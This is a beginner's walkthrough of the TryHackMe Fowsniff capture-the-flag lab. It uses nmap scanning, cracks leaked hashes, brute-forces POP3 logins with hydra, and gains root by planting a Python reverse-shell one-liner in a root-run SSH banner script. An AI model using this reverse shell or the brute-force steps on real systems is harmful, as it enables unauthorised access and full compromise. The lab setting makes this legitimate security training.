#7.TryHackMe Series writeups: Fowsniff CTF
Hello guys đ Iâm back with another walkthrough, this time tackling on Fowsniff CTF Lab from TryHackMe.
Hack this machine and get the flag. There are lots of hints along the way and is perfect for beginners!
So lets start ..!!!
As usual first we need to enumerate the box. We will use nmap utility to scan how many open ports are there.
Command: nmap -sV -sC <IP>
After executing the command, we can see the open ports and services running. Here we can see SSH, POP3, IMAP and HTTP ports.
Letâs try to access the http website running on it.
After visiting the page, we can see that âFowsniffâs internal system suffered a data breach that resulted in the exposure of employee usernames and passwordsâŠâŠâŠâ
By this we can clearly understand that there is a data breach and an attacker were able to hijack twitter. So, we can try to check the twitter account of â@fowsniffcorpâ.
After visiting the twitter there we can see the pastebin link it contains the backup of password dump.
After seeing the dump, one thing we can understand that the passwords are hashed for respective users.
Letâs try to crack the hashâŠ.
Further it was tricky to understand on how to login. But question gave the hint to check for pop3.
We must now verify that these credentials are legitimate. There are currently just nine accounts and passwords, therefore we can avoid this manually in the current situation. Instead, letâs utilize a tool since we would need one if there were hundreds of credentials.
Note: Both user.txt and pass.txt include the users and passwords that we discovered in the dump. We were also instructed to use Metasploit in the discussion. We can also use it to bruteforce the user and password, but hydra is much quicker.
Command: hydra -L user.txt -P pass.txt pop3://<IP>
We got the username and password to login.
Letâs try to login into pop3 using telnet
Command: telnet <IP> 110
If we see there are 2 messages after using the command âlistâ. Letâs check what we can find in the messages.
To read the message use command:
Command: RETR 1
Command: RETR 2
So, we got the temporary password for ssh which is clearly said in the mail. Second mail is from baksteen and apart from that we canât see anyother clue. So with hopes letâs try to login using the user.
Command: ssh baksteen@<IP>
Note: One can try to brute-force for valid username using hydra for ssh.
Weâve successfully logged into ssh. After analysing the details, nothing stood out but by the question asked âOnce connected, what groups does this user belong to? Are there any interesting files that can be run by that group?â.
Letâs check for the files in the group for baksteen user.
Command: find / -type f -group users 2>/dev/null
The script /opt/cube/cube.sh is interesting because it displays the banner that is displayed when we connect to the SSH service. Besides, we can modify it.
Letâs try to modify the cube.sh file and open the netcat listener in our machine.
python3 -c âimport socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((â<IP>â,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([â/bin/shâ,â-iâ]);â
Donât attempt to execute the file after editing the .sh file because we will obtain the same user over netcat.
Now, itâs time to escalate our privilegesâŠ.
Letâs try logging in once more with the baksteen credentials. Over netcat, we got the root shell as the cube.sh file has permission to be run as root.
And here we found the flag and completed the lab successfullyđ€©đ„đ!!!
Thanks for sticking around âŠ.
Visit my other walkthroughâs and I appreciate you taking the time to read the walkthrough.
If you found it useful, please click the button đand share it with others who have similar interests! + Feedback is always appreciated!!đ
